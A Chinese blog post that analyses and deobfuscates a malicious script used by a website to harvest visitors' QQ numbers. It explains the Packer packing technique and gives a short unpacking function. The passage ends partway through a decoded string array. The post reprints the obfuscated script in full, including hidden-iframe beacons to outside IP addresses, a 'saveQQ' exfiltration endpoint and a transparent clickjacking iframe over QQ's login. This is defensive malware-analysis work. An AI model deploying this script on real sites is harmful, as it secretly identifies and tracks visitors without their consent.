本鱼拟成立工作室承接项目开发/软件定制/云设施开发运维/办公设备技术支持等,如您有相关需求,欢迎来询 | ::博客文章推荐::

关于一个XSS盗取用户QQ号网站所使用脚本的反混淆

: WEB前端 木魚 10050℃ 3评论

0.前言

之所以会有文章,是因为有几个朋友在下午我写的博客《记追查QQ号泄露的过程》中留言,希望了解点关于反混淆脚本的背景资料。其实比较了解Javascript的话,并不算难事,只要通过观察分析,很容易得到反加密混淆的方法。毕竟js是一种解释性的语言,在执行前肯定是以文本形式存在的,只有看的难度高低而已。

以下是针对下午遇到的几个js脚本反混淆实例。

提醒:加密混淆方法千千万,但大多都有很明显的特征。因此这里看到的方法不一定通用,仅供了解参考使用。
再就是,加密混淆可能不止一次(为了制造难度),解密/反混淆的步骤,和加密/混淆是相反的。

1.演示

本文已附演示页面。

点这里看演示页面

演示代码中,最终解密出来的代码并没有格式化,可最终由其它工具来进行格式化。

2.第一个脚本解析

第一个脚本也就是引入脚本,是由网页直接引入,并负责挂载最终的sx.php页面所使用的引导脚本。从技术上说,它加密混淆也是最复杂的。

未经处理的脚本如下:

var puid="5867″;var pap="http://182.92.239.23/g.php?surl=";var pr = encodeURIComponent(document.referrer);var pu = encodeURIComponent(document.location.href);var pt = encodeURIComponent(document.title);var phead = document.getElementsByTagName('HEAD').item(0);var cslist="uid="+puid+"&r=" + pr + "&u=" + pu + "&t=" + pt;var purl = encodeURIComponent("http://42.120.11.238:8888/?action=p&"+cslist+"&f=jfif&p=");function Cimg(src) {var a = document.createElement("img");a.src = src;a.style = "display:none";};function Cifr(src) {var ifr = document.createElement("iframe");ifr.src = src;ifr.width =ifr.height= ifr.frameBorder=0;ifr.scrolling = "no";ifr.allowTransparency = "true";ifr.style.display='none';phead.appendChild(ifr);};Cifr(pap + purl);
var i_php = "http://42.120.11.238:8888/";var i_uid = "5867";var i_h="0″;var i_qq="0″;var i_d="www.zxdl369.cn"; var i_yc= 2000;var i_fkid="2321171036″;
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!".replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c–)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('C j=["\\m\\l\\k\\v","\\4l\\1t\\1l\\2d","\\E\\k\\l\\1t\\s\\k\\v\\k\\o\\l\\w\\1n\\O\\1e\\q\\E\\2z\\q\\v\\k","\\p\\k\\G\\k\\p\\p\\k\\p","\\B\\p\\k\\G","\\s\\n\\u\\q\\l\\m\\n\\o","\\l\\m\\l\\s\\k","\\m\\G\\p\\q\\v\\k","\\u\\p\\k\\q\\l\\k\\1t\\s\\k\\v\\k\\o\\l","\\w\\p\\u","","\\m\\y","\\u\\w\\w\\1e\\k\\R\\l","\\w\\l\\O\\s\\k","\\1b\\m\\y\\l\\B\\N\\F\\r\\R\\L\\B\\k\\m\\E\\B\\l\\N\\F\\r\\R\\L\\y\\m\\w\\r\\s\\q\\O\\N\\o\\n\\o\\k\\L","\\w\\u\\p\\n\\s\\s\\m\\o\\E","\\o\\n","\\G\\p\\q\\v\\k\\H\\n\\p\\y\\k\\p","\\F","\\w\\k\\l\\1l\\l\\l\\p\\m\\H\\x\\l\\k","\\q\\r\\r\\k\\o\\y\\1k\\B\\m\\s\\y","\\w\\u\\p\\m\\r\\l","\\l\\O\\r\\k","\\l\\k\\R\\l\\M\\2N\\q\\X\\q\\w\\u\\p\\m\\r\\l","\\u\\B\\q\\p\\w\\k\\l","\\x\\l\\G\\1a\\1Z","\\1n\\1Y\\2d\\1X","\\1f\\2e\\2h\\P\\1c","\\t\\1f\\4j\\2e\\L\\4e\\3U\\1c\\1f\\L\\2h\\2M\\1c","\\v\\q\\l\\u\\B","\\u\\n\\n\\W\\m\\k","\\E\\k\\l\\1e\\m\\v\\k","\\w\\k\\l\\1e\\m\\v\\k","\\t","\\L\\k\\R\\r\\m\\p\\k\\w\\t","\\l\\n\\3S\\2c\\1e\\1j\\l\\p\\m\\o\\E","\\1g\\q\\u\\l\\m\\n\\o\\t\\w\\q\\X\\k\\2f\\2f\\z\\x\\m\\y\\t","\\z\\I\\1p\\t","\\z\\l\\m\\v\\k\\t","\\z\\p\\k\\G\\k\\p\\p\\k\\p\\t","\\z\\x\\p\\s\\t","\\z\\l\\m\\l\\s\\k\\t","\\z\\p\\t","\\w\\v\\k\\X\\o\\Q\\y\\x","\\M\\w\\R\\K\\r\\B\\r\\1g\\x\\m\\y\\t","\\z\\p\\k\\G\\t","\\z\\G\\x\\p\\s\\t","\\z\\G\\W\\m\\y\\t","\\z\\l\\v\\t","\\M\\v\\M\\1b\\y\\s\\K\\r\\B\\r\\1g\\u\\t","\\z\\p\\t\\V\\z\\l\\m\\v\\k\\t","\\1X","\\x\\w\\k\\p\\1l\\E\\k\\o\\l","\\m\\G\\r\\l\\x\\Q\\x","\\v\\H\\Q\\x\\r\\l\\s\\n\\E\\m\\o","\\3N\\m\\G\\p\\q\\v\\k\\P\\w\\l\\O\\s\\k\\t\\T\\r\\n\\w\\m\\l\\m\\n\\o\\N\\q\\H\\w\\n\\s\\x\\l\\k\\L\\1b\\m\\y\\l\\B\\N\\Q\\1Z\\F\\r\\R\\L\\B\\k\\m\\E\\B\\l\\N\\1I\\1H\\1H\\r\\R\\L\\P\\v\\q\\p\\E\\m\\o\\N\\1a\\V\\Q\\F\\r\\R\\P\\F\\P\\F\\P\\1a\\1I\\1G\\F\\r\\R\\L\\G\\m\\s\\l\\k\\p\\N\\q\\s\\r\\B\\q\\1f\\n\\r\\q\\u\\m\\l\\O\\t\\F\\F\\1c\\L\\1a\\v\\n\\1p\\1a\\n\\r\\q\\u\\m\\l\\O\\N\\F\\K\\F\\L\\1a\\W\\B\\l\\v\\s\\1a\\n\\r\\q\\u\\m\\l\\O\\N\\P\\F\\K\\F\\L\\n\\r\\q\\u\\m\\l\\O\\N\\P\\F\\K\\F\\L\\T\\P\\w\\u\\p\\n\\s\\s\\m\\o\\E\\t\\T\\o\\n\\T\\P\\o\\q\\v\\k\\t\\T\\v\\H\\Q\\x\\T\\P\\m\\y\\t\\T\\v\\H\\Q\\x\\r\\l\\s\\n\\E\\m\\o\\T\\P\\w\\p\\u\\t\\T\\B\\l\\l\\r\\N\\M\\M\\x\\m\\K\\r\\l\\s\\n\\E\\m\\o\\Y\\K\\I\\I\\K\\u\\n\\v\\M\\u\\E\\m\\1a\\H\\m\\o\\M\\s\\n\\E\\m\\o\\1g\\s\\m\\o\\W\\U\\l\\q\\p\\E\\k\\l\\t\\H\\s\\q\\o\\W\\z\\l\\q\\p\\E\\k\\l\\t\\H\\s\\q\\o\\W\\z\\q\\r\\r\\m\\y\\t\\1H\\F\\F\\F\\Y\\F\\V\\z\\y\\q\\m\\y\\t\\Y\\Y\\F\\z\\B\\m\\y\\k\\U\\x\\m\\o\\U\\l\\m\\r\\t\\V\\z\\w\\l\\O\\s\\k\\t\\V\\V\\z\\B\\m\\y\\k\\U\\u\\s\\n\\w\\k\\U\\m\\u\\n\\o\\t\\V\\z\\l\\q\\p\\E\\k\\l\\t\\w\\k\\s\\G\\z\\I\\l\\q\\p\\E\\k\\l\\t\\F\\z\\B\\m\\y\\k\\U\\l\\m\\l\\s\\k\\U\\H\\q\\p\\t\\V\\z\\w\\U\\x\\p\\s\\t\\B\\l\\l\\r\\1w\\1I\\1l\\1w\\Y\\1x\\1w\\Y\\1x\\q\\r\\r\\K\\y\\q\\l\\q\\K\\I\\I\\K\\u\\n\\v\\1w\\Y\\1x\\u\\q\\l\\k\\1w\\Y\\1x\\r\\n\\r\\1y\\n\\E\\m\\o\\T\\P\\G\\p\\q\\v\\k\\H\\n\\p\\y\\k\\p\\t\\T\\F\\T\\P\\n\\o\\s\\n\\q\\y\\t\\T\\w\\k\\l\\1e\\m\\v\\k\\n\\x\\l\\1f\\l\\n\\r\\K\\v\\H\\Q\\x\\U\\m\\G\\v\\n\\X\\k\\3L\\F\\1c\\L\\T\\3I","\\2N\\q\\X\\q\\w\\u\\p\\m\\r\\l\\N\\r\\q\\p\\k\\o\\l\\K\\v\\H\\Q\\x\\r\\l\\s\\n\\E\\m\\o","\\r\\n\\w\\m\\l\\m\\n\\o\\N\\q\\H\\w\\n\\s\\x\\l\\k\\L\\P\\1p\\1a\\m\\o\\y\\k\\R\\N\\P\\Y\\V\\1G\\2o\\1G\\1Z\\1I\\1H\\1G\\2o\\L\\1b\\m\\y\\l\\B\\N\\Q\\F\\r\\R\\L\\P\\B\\k\\m\\E\\B\\l\\N\\Q\\F\\r\\R\\L\\P","\\n\\o\\k\\p\\p\\n\\p","\\p\\k\\l\\x\\p\\o\\P\\l\\p\\x\\k\\L","\\G\\m\\p\\w\\l\\1k\\B\\m\\s\\y","\\H\\n\\y\\O","\\m\\o\\w\\k\\p\\l\\1n\\k\\G\\n\\p\\k","\\u\\x\\p\\p\\k\\o\\l\\1j\\l\\O\\s\\k","\\E\\k\\l\\1k\\n\\v\\r\\x\\l\\k\\y\\1j\\l\\O\\s\\k","\\1a\\2M\\V","\\p\\k\\r\\s\\q\\u\\k","\\l\\n\\1y\\n\\1b\\k\\p\\1k\\q\\w\\k","\\y\\k\\G\\q\\x\\s\\l\\3E\\m\\k\\1b","\\v\\H\\Q\\x\\U\\m\\G\\v\\n\\X\\k","\\E\\k\\l\\1t\\s\\k\\v\\k\\o\\l\\1n\\O\\3D\\y","\\n\\o\\v\\n\\x\\w\\k\\v\\n\\X\\k","\\G\\n\\u\\x\\w","\\k\\X\\k\\o\\l","\\u\\s\\m\\k\\o\\l\\3x","\\u\\s\\m\\k\\o\\l\\1X","\\w\\u\\p\\n\\s\\s\\1e\\n\\r","\\y\\n\\u\\x\\v\\k\\o\\l\\1t\\s\\k\\v\\k\\o\\l","\\n\\G\\G\\w\\k\\l\\2u\\m\\y\\l\\B","\\w\\u\\p\\n\\s\\s\\1y\\k\\G\\l","\\r\\n\\w\\m\\l\\m\\n\\o","\\u\\s\\m\\k\\o\\l\\2u\\m\\y\\l\\B","\\p\\k\\s\\q\\l\\m\\X\\k","\\l\\n\\r","\\r\\R","\\s\\k\\G\\l","\\n\\o\\v\\n\\x\\w\\k\\n\\X\\k\\p","\\n\\o\\v\\n\\x\\w\\k\\n\\x\\l","\\n\\o\\H\\s\\x\\p","\\y\\m\\w\\r\\s\\q\\O","\\o\\n\\o\\k","\\k\\s\\k\\v\\k\\o\\l\\1x\\p\\n\\v\\2v\\n\\m\\o\\l","\\u\\s\\m\\u\\W","\\V","\\l\\k\\o\\u\\k\\o\\l\\N\\M\\M\\v\\k\\w\\w\\q\\E\\k\\M\\1g\\x\\m\\o\\t","\\z\\1j\\m\\l\\k\\t","\\z\\2c\\k\\o\\x\\t\\O\\k\\w","\\I\\I\\u\\B\\q\\l\\Q\\x\\V","\\B\\l\\l\\r\\N\\M\\M\\1b\\r\\s\\K\\H\\K\\I\\I\\K\\u\\n\\v\\M\\u\\E\\m\\M\\u\\n\\o\\X\\K\\r\\B\\r\\1g\\o\\x\\v\\t","\\z\\u\\H\\t\\3w\\1j\\1Y\\2z\\2v\\U\\1k\\1l\\1y\\1y\\1n\\1l\\1k\\3v\\U\\Q\\x","\\H\\m\\1p\\I\\I\\W\\k\\O","\\W\\G\\x\\m\\o","\\y\\q\\l\\q","\\B\\l\\l\\r\\N\\M\\M\\1b\\r\\y\\K\\H\\K\\I\\I\\K\\u\\n\\v\\M\\u\\E\\m\\M\\E\\k\\l\\U\\w\\m\\E\\o\\K\\r\\B\\r\\1g\\o\\q\\t","\\z\\W\\G\\x\\m\\o\\t","\\z\\q\\l\\O\\t\\F\\z\\q\\t\\F\\z\\w\\m\\y\\t\\z\\x\\m\\y\\t\\z\\x\\p\\s\\t","\\z\\y\\v\\t\\z\\u\\s\\W\\1j\\p\\u\\t\\z\\k\\R\\l\\t\\z\\u\\H\\t\\H\\m\\1p\\I\\I\\W\\k\\O\\Q\\x","\\z\\q\\v\\r\\L","\\z","\\w\\m\\E\\o","\\M","\\I\\I\\u\\B\\q\\l\\Q\\x\\Y","\\m\\o\\y\\k\\R\\1Y\\G","\\y\\n\\v\\q\\m\\o","\\I\\I\\u\\B\\q\\l\\Q\\x\\1f\\V\\1c","\\Y","\\I\\I\\u\\B\\q\\l\\Q\\x\\1f\\1c"];C 1Q=D[j[2]](j[1])[j[0]](0);C 1D=0;C 2K=0;C 1r=1L;C 1R=1M(D[j[3]]);C 1E=1M(D[j[5]][j[4]]);C 1F=1M(D[j[6]]);J 2m(b,c){C a=D[j[8]](j[7]);a[j[9]]=b;S(c!=j[10]&&c!=1d){a[j[11]]=c};a[j[13]][j[12]]=j[14];a[j[15]]=j[16];a[j[19]](j[17],j[18],0);1Q[j[20]](a)}J 1s(b,c){C a=D[j[8]](j[21]);a[j[22]]=j[23];S(c!=j[10]&&c!=1d){a[j[11]]=c};a[j[24]]=j[25];a[j[9]]=b;1Q[j[20]](a)}J 1N(b,c){C a=D[j[8]](j[7]);a[j[9]]=b;S(c!=j[10]&&c!=1d){a[j[11]]=c};a[j[13]][j[12]]=j[14];a[j[15]]=j[16];a[j[19]](j[17],j[18],0);D[j[2]](j[26])[j[0]](0)[j[20]](a)}J 2j(a){C b,2k=1z 3s(j[27]+a+j[28]);S(b=D[j[30]][j[29]](2k)){1o 3o(b[2])}1J{1o 1d}}J 2s(a,b){C c=1z 1K();c[j[32]](c[j[31]]()+2*24*1T*1T*2x);D[j[30]]=a+j[33]+3j(b)+j[34]+c[j[35]]()}J 3i(){C a=1W+j[36]+2E+j[37]+3g+j[38]+3a+j[39]+1R+j[40]+1E+j[41]+1F+j[42]+(1z 1K())[j[31]]();1s(a,j[43])}J 2a(){C a=1W+j[44]+2E+j[45]+1R+j[46]+1E+j[41]+1F+j[47]+2P+j[48]+(1z 1K())[j[31]]();2m(a)}J 2O(){C a=1W+j[49]+2P+j[2Q]+(1z 1K)[j[31]]();1s(a);1v(2L,2R)}J 2L(){S(2S==j[2T]){S(!2U[j[2V]][j[29]](/(2W|2X|2Y|2Z)/i)){S(2j(j[2I])==1d){2H()}}}}J 2H(){1m[j[1u]]=j[3b];C a=D[j[8]](j[7]);a[j[9]]=j[3c];a[j[11]]=j[1u];a[j[13]][j[12]]=j[3d];a[j[15]]=j[16];a[j[3e]]=j[3f];a[j[19]](j[17],j[18],0);C b=D[j[1h]][j[1T]];D[j[1h]][j[3h]](a,b)}J 2F(a,b){S(a[j[2D]]){1o a[j[2D]][b]}1J{S(1m[j[2B]]){1V=b[j[1U]](/([A-Z])/g,j[3k]);1V=b[j[3l]]();1o D[j[3m]][j[2B]](a,1d)[1V]}};1o 1d}1m[j[3n]]=J(){C h=D[j[1S]](j[1u]);2q(h,2n);D[j[3p]]=J(a){1r=1L;1m[j[3q]]();C b=D[j[1S]](j[1u]);C a=a||1m[j[3r]];1D=a[j[1i]];1D=a[j[1P]];C c=D[j[1h]][j[2i]]+D[j[1A]][j[2i]];C d=D[j[1A]][j[1q]]-a[j[1i]];C e=D[j[1h]][j[2g]]+D[j[1A]][j[2g]];C f=0;C g=2F(D[j[1h]],j[3t]);S(D[j[1A]][j[1C]]>D[j[1h]][j[1C]]&&g==j[3u]){f=(D[j[1A]][j[1C]]-D[j[1h]][j[1C]])/2;f=f+e;b[j[13]][j[2y]]=(c+a[j[1P]]-25)+j[1B];b[j[13]][j[2t]]=((d<b[j[1q]]?a[j[1i]]-b[j[1q]]:a[j[1i]])-f)+j[1B]}1J{f=f+e;b[j[13]][j[2y]]=(c+a[j[1P]]-25)+j[1B];b[j[13]][j[2t]]=((d<b[j[1q]]?a[j[1i]]-b[j[1q]]:a[j[1i]])+f)+j[1B]}}};J 2q(a,b){a[j[3y]]=J(){1r=3z};a[j[3A]]=J(){1r=1L};1m[j[3B]]=J(){S(1r){b()}}}J 2n(){C b=D[j[1S]](j[1u]);1v(J(){3C{b[j[13]][j[2r]]=j[2p];C a=D[j[3F]](1D,2K);a[j[3G]]()}3H(e){b[j[13]][j[2r]]=j[2p]};2a();2s(j[2I],j[2l])},2x)}J 3J(i){S(i==1){C a=j[3K]+1O+j[3M]+2G+j[3O];1N(a,j[3P])}1J{1s(j[3Q]+1O+j[3R],j[2b])}}J 3T(a){C b=a[j[2J]][j[3V]];1s(j[3W]+1O+j[3X]+b+j[3Y]+1E+j[41]+1F+j[3Z],j[2b])}J 4a(a){C b=a[j[2J]][j[4b]][j[1U]](j[4c],j[4d]);b=b[j[1U]](j[2C],j[2C]);1N(b,j[4f])}S(D[j[4g]][j[4h]](2G)>=0){2a();1v(2O,4i);S(2A==j[2l]){1v(j[4k],2w)};S(2A==j[4m]){1v(j[4n],2w)}};',62,272,'|||||||||||||||||||_0xc112|x65|x74|x69|x6F|x6E|x72|x61|x70|x6C|x3D|x63|x6D|x73|x75|x64|x26||x68|var|document|x67|x30|x66|x62|x71|function|x2E|x3B|x2F|x3A|x79|x20|x35|x78|if|x22|x5F|x31|x6B|x76|x32||||||||||||x2D|x77|x29|null|x54|x28|x3F|61|74|x53|x43|x41|window|x42|return|x7A|78|mb5u_iframe_hover|Creatjs5u|x45|54|setTimeout|x25|x46|x4C|new|77|84|81|mb5ux|i_url|i_title|x34|x36|x33|else|Date|false|encodeURIComponent|Creatif5ubody|i_qq|75|mb5u_oHead|i_referrer|70|60|66|propprop|i_php|x59|x4F|x38|||||||||||Umb5u|100|x4D|x44|x5E|x51|79|x7C|76|Gc5u|reg|93|Creatif5u|mb5uiframeclickcallback|x37|90|mb5u_iframeClick|89|Sc5u|85|x57|x50|i_yc|1000|83|x4E|i_h|64|110|63|i_uid|mb5u_GetCurrentStyle|i_d|ptU5u|53|102|mb5uy|ck5u|x24|x6A|mb5u_noLogin|i_fkid|50|500|wdl|51|navigator|52|iPhone|iPod|Android|ios|||||||||||i_time|55|56|57|58|59|i_qz|62|Q5u|escape|65|67|68|69|unescape|71|72|73|RegExp|80|82|x4B|x4A|x58|86|true|87|88|try|x49|x56|91|92|catch|x3E|qqchat5u|94|x2C|95|x3C|96|97|98|99|x47|JSONP_CALLBACK_5u|x2A|101|103|104|105|106|||||||||||bizqqkey5u|109|107|108|x5D|111|113|112|1500|x5B|114|x48|115|116′.split('|'),0,{}));

比较了解javascript的同学应该可以一眼看出,前面都是一些比较常规的函数定义和变量定义,只不过经过压缩了而已。而经过压缩混淆的代码,正是从加粗的eval开始。

这加密的方式是Packer。

Packer打包的历史其实比较悠久,jquery早期都是用这种方式进行打包的,近些年见得不多了。其原理是生成一段自解压的脚本,将原函数提取关键字分割后生成一个压缩的字符串。解密函数中带有特征的p,a,c,k,e,r六个参数变量,如下所示:

eval(function(p,a,c,k,e,r){

packer生成的加密字符串在运行前需要先还原,最终丢给eval来执行。换句话说,在eval执行前拦截并拿走生成的结果,其实就解密了。因此,要解密packer的代码,最简单的方法就是复制源代码,把eval换成返回语句,然后直接eval对应的代码,便可以获得最终的结果了。

示例中解密代码如下:

evalfunction (str) {
	return eval("(function(){" + str.replace(/eval\(/"return (") + ";})();");
}

示例页面中,演示1的步骤一,以及演示3均属于使用此方法来解密packer代码。

作为例子,演示1中代码经过此步骤解密后,将会变成这样。

var _0xc112=["\x69\x74\x65\x6D","\x48\x45\x41\x44″,"\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,"\x72\x65\x66\x65\x72\x72\x65\x72″,"\x68\x72\x65\x66″,"\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x74\x69\x74\x6C\x65″,"\x69\x66\x72\x61\x6D\x65″,"\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,"\x73\x72\x63″,"","\x69\x64″,"\x63\x73\x73\x54\x65\x78\x74″,"\x73\x74\x79\x6C\x65″,"\x77\x69\x64\x74\x68\x3A\x30\x70\x78\x3B\x68\x65\x69\x67\x68\x74\x3A\x30\x70\x78\x3B\x64\x69\x73\x70\x6C\x61\x79\x3A\x6E\x6F\x6E\x65\x3B","\x73\x63\x72\x6F\x6C\x6C\x69\x6E\x67″,"\x6E\x6F","\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72″,"\x30″,"\x73\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65″,"\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,"\x73\x63\x72\x69\x70\x74″,"\x74\x79\x70\x65″,"\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74″,"\x63\x68\x61\x72\x73\x65\x74″,"\x75\x74\x66\x2D\x38″,"\x42\x4F\x44\x59″,"\x28\x5E\x7C\x20\x29″,"\x3D\x28\x5B\x5E\x3B\x5D\x2A\x29\x28\x3B\x7C\x24\x29″,"\x6D\x61\x74\x63\x68″,"\x63\x6F\x6F\x6B\x69\x65″,"\x67\x65\x74\x54\x69\x6D\x65″,"\x73\x65\x74\x54\x69\x6D\x65″,"\x3D","\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x47\x4D\x54\x53\x74\x72\x69\x6E\x67″,"\x3F\x61\x63\x74\x69\x6F\x6E\x3D\x73\x61\x76\x65\x51\x51\x26\x75\x69\x64\x3D","\x26\x71\x7A\x3D","\x26\x74\x69\x6D\x65\x3D","\x26\x72\x65\x66\x65\x72\x72\x65\x72\x3D","\x26\x75\x72\x6C\x3D","\x26\x74\x69\x74\x6C\x65\x3D","\x26\x72\x3D","\x73\x6D\x65\x76\x6E\x35\x64\x75″,"\x2F\x73\x78\x2E\x70\x68\x70\x3F\x75\x69\x64\x3D","\x26\x72\x65\x66\x3D","\x26\x66\x75\x72\x6C\x3D","\x26\x66\x6B\x69\x64\x3D","\x26\x74\x6D\x3D","\x2F\x6D\x2F\x77\x64\x6C\x2E\x70\x68\x70\x3F\x63\x3D","\x26\x72\x3D\x31\x26\x74\x69\x6D\x65\x3D","\x59″,"\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,"\x69\x66\x70\x74\x75\x35\x75″,"\x6D\x62\x35\x75\x70\x74\x6C\x6F\x67\x69\x6E","\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x74\x79\x6C\x65\x3D\x22\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x77\x69\x64\x74\x68\x3A\x35\x38\x30\x70\x78\x3B\x68\x65\x69\x67\x68\x74\x3A\x33\x36\x36\x70\x78\x3B\x20\x6D\x61\x72\x67\x69\x6E\x3A\x2D\x31\x35\x30\x70\x78\x20\x30\x20\x30\x20\x2D\x33\x34\x30\x70\x78\x3B\x66\x69\x6C\x74\x65\x72\x3A\x61\x6C\x70\x68\x61\x28\x6F\x70\x61\x63\x69\x74\x79\x3D\x30\x30\x29\x3B\x2D\x6D\x6F\x7A\x2D\x6F\x70\x61\x63\x69\x74\x79\x3A\x30\x2E\x30\x3B\x2D\x6B\x68\x74\x6D\x6C\x2D\x6F\x70\x61\x63\x69\x74\x79\x3A\x20\x30\x2E\x30\x3B\x6F\x70\x61\x63\x69\x74\x79\x3A\x20\x30\x2E\x30\x3B\x22\x20\x73\x63\x72\x6F\x6C\x6C\x69\x6E\x67\x3D\x22\x6E\x6F\x22\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x62\x35\x75\x22\x20\x69\x64\x3D\x22\x6D\x62\x35\x75\x70\x74\x6C\x6F\x67\x69\x6E\x22\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x75\x69\x2E\x70\x74\x6C\x6F\x67\x69\x6E\x32\x2E\x71\x71\x2E\x63\x6F\x6D\x2F\x63\x67\x69\x2D\x62\x69\x6E\x2F\x6C\x6F\x67\x69\x6E\x3F\x6C\x69\x6E\x6B\x5F\x74\x61\x72\x67\x65\x74\x3D\x62\x6C\x61\x6E\x6B\x26\x74\x61\x72\x67\x65\x74\x3D\x62\x6C\x61\x6E\x6B\x26\x61\x70\x70\x69\x64\x3D\x36\x30\x30\x30\x32\x30\x31\x26\x64\x61\x69\x64\x3D\x32\x32\x30\x26\x68\x69\x64\x65\x5F\x75\x69\x6E\x5F\x74\x69\x70\x3D\x31\x26\x73\x74\x79\x6C\x65\x3D\x31\x31\x26\x68\x69\x64\x65\x5F\x63\x6C\x6F\x73\x65\x5F\x69\x63\x6F\x6E\x3D\x31\x26\x74\x61\x72\x67\x65\x74\x3D\x73\x65\x6C\x66\x26\x71\x74\x61\x72\x67\x65\x74\x3D\x30\x26\x68\x69\x64\x65\x5F\x74\x69\x74\x6C\x65\x5F\x62\x61\x72\x3D\x31\x26\x73\x5F\x75\x72\x6C\x3D\x68\x74\x74\x70\x25\x33\x41\x25\x32\x46\x25\x32\x46\x61\x70\x70\x2E\x64\x61\x74\x61\x2E\x71\x71\x2E\x63\x6F\x6D\x25\x32\x46\x63\x61\x74\x65\x25\x32\x46\x70\x6F\x70\x4C\x6F\x67\x69\x6E\x22\x20\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\x3D\x22\x30\x22\x20\x6F\x6E\x6C\x6F\x61\x64\x3D\x22\x73\x65\x74\x54\x69\x6D\x65\x6F\x75\x74\x28\x74\x6F\x70\x2E\x6D\x62\x35\x75\x5F\x69\x66\x6D\x6F\x76\x65\x2C\x30\x29\x3B\x22\x3E","\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x70\x61\x72\x65\x6E\x74\x2E\x6D\x62\x35\x75\x70\x74\x6C\x6F\x67\x69\x6E","\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x20\x7A\x2D\x69\x6E\x64\x65\x78\x3A\x20\x32\x31\x34\x37\x34\x38\x33\x36\x34\x37\x3B\x77\x69\x64\x74\x68\x3A\x35\x30\x70\x78\x3B\x20\x68\x65\x69\x67\x68\x74\x3A\x35\x30\x70\x78\x3B\x20″,"\x6F\x6E\x65\x72\x72\x6F\x72″,"\x72\x65\x74\x75\x72\x6E\x20\x74\x72\x75\x65\x3B","\x66\x69\x72\x73\x74\x43\x68\x69\x6C\x64″,"\x62\x6F\x64\x79″,"\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,"\x63\x75\x72\x72\x65\x6E\x74\x53\x74\x79\x6C\x65″,"\x67\x65\x74\x43\x6F\x6D\x70\x75\x74\x65\x64\x53\x74\x79\x6C\x65″,"\x2D\x24\x31″,"\x72\x65\x70\x6C\x61\x63\x65″,"\x74\x6F\x4C\x6F\x77\x65\x72\x43\x61\x73\x65″,"\x64\x65\x66\x61\x75\x6C\x74\x56\x69\x65\x77″,"\x6D\x62\x35\x75\x5F\x69\x66\x6D\x6F\x76\x65″,"\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64″,"\x6F\x6E\x6D\x6F\x75\x73\x65\x6D\x6F\x76\x65″,"\x66\x6F\x63\x75\x73″,"\x65\x76\x65\x6E\x74″,"\x63\x6C\x69\x65\x6E\x74\x58″,"\x63\x6C\x69\x65\x6E\x74\x59″,"\x73\x63\x72\x6F\x6C\x6C\x54\x6F\x70″,"\x64\x6F\x63\x75\x6D\x65\x6E\x74\x45\x6C\x65\x6D\x65\x6E\x74″,"\x6F\x66\x66\x73\x65\x74\x57\x69\x64\x74\x68″,"\x73\x63\x72\x6F\x6C\x6C\x4C\x65\x66\x74″,"\x70\x6F\x73\x69\x74\x69\x6F\x6E","\x63\x6C\x69\x65\x6E\x74\x57\x69\x64\x74\x68″,"\x72\x65\x6C\x61\x74\x69\x76\x65″,"\x74\x6F\x70″,"\x70\x78″,"\x6C\x65\x66\x74″,"\x6F\x6E\x6D\x6F\x75\x73\x65\x6F\x76\x65\x72″,"\x6F\x6E\x6D\x6F\x75\x73\x65\x6F\x75\x74″,"\x6F\x6E\x62\x6C\x75\x72″,"\x64\x69\x73\x70\x6C\x61\x79″,"\x6E\x6F\x6E\x65″,"\x65\x6C\x65\x6D\x65\x6E\x74\x46\x72\x6F\x6D\x50\x6F\x69\x6E\x74″,"\x63\x6C\x69\x63\x6B","\x31″,"\x74\x65\x6E\x63\x65\x6E\x74\x3A\x2F\x2F\x6D\x65\x73\x73\x61\x67\x65\x2F\x3F\x75\x69\x6E\x3D","\x26\x53\x69\x74\x65\x3D","\x26\x4D\x65\x6E\x75\x3D\x79\x65\x73″,"\x71\x71\x63\x68\x61\x74\x35\x75\x31″,"\x68\x74\x74\x70\x3A\x2F\x2F\x77\x70\x6C\x2E\x62\x2E\x71\x71\x2E\x63\x6F\x6D\x2F\x63\x67\x69\x2F\x63\x6F\x6E\x76\x2E\x70\x68\x70\x3F\x6E\x75\x6D\x3D","\x26\x63\x62\x3D\x4A\x53\x4F\x4E\x50\x5F\x43\x41\x4C\x4C\x42\x41\x43\x4B\x5F\x35\x75″,"\x62\x69\x7A\x71\x71\x6B\x65\x79″,"\x6B\x66\x75\x69\x6E","\x64\x61\x74\x61″,"\x68\x74\x74\x70\x3A\x2F\x2F\x77\x70\x64\x2E\x62\x2E\x71\x71\x2E\x63\x6F\x6D\x2F\x63\x67\x69\x2F\x67\x65\x74\x5F\x73\x69\x67\x6E\x2E\x70\x68\x70\x3F\x6E\x61\x3D","\x26\x6B\x66\x75\x69\x6E\x3D","\x26\x61\x74\x79\x3D\x30\x26\x61\x3D\x30\x26\x73\x69\x64\x3D\x26\x75\x69\x64\x3D\x26\x75\x72\x6C\x3D","\x26\x64\x6D\x3D\x26\x63\x6C\x6B\x53\x72\x63\x3D\x26\x65\x78\x74\